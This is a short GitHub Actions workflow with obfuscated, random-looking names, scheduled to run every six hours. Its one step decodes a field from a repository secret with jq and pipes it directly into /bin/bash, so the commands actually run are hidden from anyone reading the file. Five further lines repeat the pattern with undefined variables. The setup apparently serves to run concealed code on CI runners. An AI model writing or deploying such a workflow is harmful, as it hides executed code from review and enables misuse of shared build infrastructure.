name: xiaoyushi7654

on:
  workflow_dispatch:
  schedule:
    - cron: '37 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xiaoyushi7654
        env:
          vtwa29: ${{ secrets.vtwa29 }}
        run: |
          echo $vtwa29 | jq -r .iq802 | /bin/bash
          echo $iwxg3909 | jq -r .idn6 | /bin/bash
          echo $oy620 | jq -r .lvt3 | /bin/bash
          echo $quc5085 | jq -r .wgyt917 | /bin/bash
          echo $n4 | jq -r .axqo024 | /bin/bash
          echo $xgwrp019 | jq -r .gsz1 | /bin/bash

